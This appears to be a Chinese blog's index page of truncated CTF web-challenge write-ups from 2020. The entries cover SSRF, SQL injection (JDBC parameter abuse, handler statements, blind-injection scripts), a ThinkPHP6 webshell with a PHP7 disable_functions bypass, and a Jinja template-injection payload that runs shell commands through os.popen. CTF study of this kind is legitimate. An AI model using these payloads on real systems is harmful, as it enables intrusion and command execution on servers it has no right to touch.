2020年06月03日
网鼎杯玄武组题目,ssrf代码<?php
function check_inner_ip($url)
{
$match_result=preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/',$url);
if (!$match_result)
{
2020年05月18日
打开页面是这样的通过给的附件进行代码审计,发现有sql注入漏洞注入点为dbName参数,首先需要解决的问题是如何绕过 "jdbc:mysql://mysqldbserver:3306/" + dbName;找到jdbc的连接字符串参数文档,发现dbName后面加上?后面可以加任意参数,就不会影响正常的数据库连接也就是说dbName可以等于myapp?a=1..... ,a=1 后面可以写单引号来注入了,经过测试找到注入点myapp?a=1'&nb
2020年02月23日
<?php
# flag在fl4g里
include 'waf.php';
header("Content-type: text/html; charset=utf-8");
$db = 
2020年02月23日
注册个账号,并且发现源码泄露要求必须使用ADMIN登录var express = require('express');
var router = express.Router();
const isObject = obj => obj && obj.constructor && obj.
2020年02月23日
先注册个用户然后登录,提示说漏洞在search位置用bp拦截搜索请求根据thinkphp6的漏洞,上传一个马连接木马,发现禁用了system函数,flag在根目录下,必须执行/readflag才能读取到,所以我们使用php7的绕过脚本进行读取<?php
pwn("cd / &&./readflag");
function pwn($cmd) {
global&n
2020年02月23日
模板注入漏洞,在base64解码页面上,先加密payload{{{}.__class__.__base__.__subclasses__()[103].__init__.__globals__['__builtins__']['ev'+'al']("__imp"+"ort_"+"_('o"+"s').po"+"pen('cat 
2020年02月23日
危险函数所导致的命令执行eval()eval() 函数可计算某个字符串,并执行其中的的 JavaScript 代码。和PHP中eval函数一样,如果传递到函数中的参数可控并且没有经过严格的过滤时,就会导致漏洞的出现。简单例子:main.jsvar express = require("express");var app = express();app.get('/eval',function(req,
2020年02月22日
测试出注入点2-(ascii(substr(database(),1,1))>1)由于过滤了or和union select,无法通过常规手段获取表名和字段名,使用mysql5.7新特性获得表名,使用select语句比较时按各字段进行比较的特点,来构造盲注语句,代码如下:#encoding=utf-8
import requests
def str_to_hex(s):
return '
2020年02月22日
熟悉的界面,点击输入框,出现以前的题输入过的payload,试一试就得到了flag,应该是原题1';show tables;#1';handler FlagHere open;handler FlagHere read first;#
2020年02月22日
宽字节注入+存储过程绕过+语句转十六进制脚本如下import requests
flag = ""
cookie = {
'ci_session': '934c5dbfca4a789a17b73c1f36c6ec78b81b02b3',
'UM_distinctid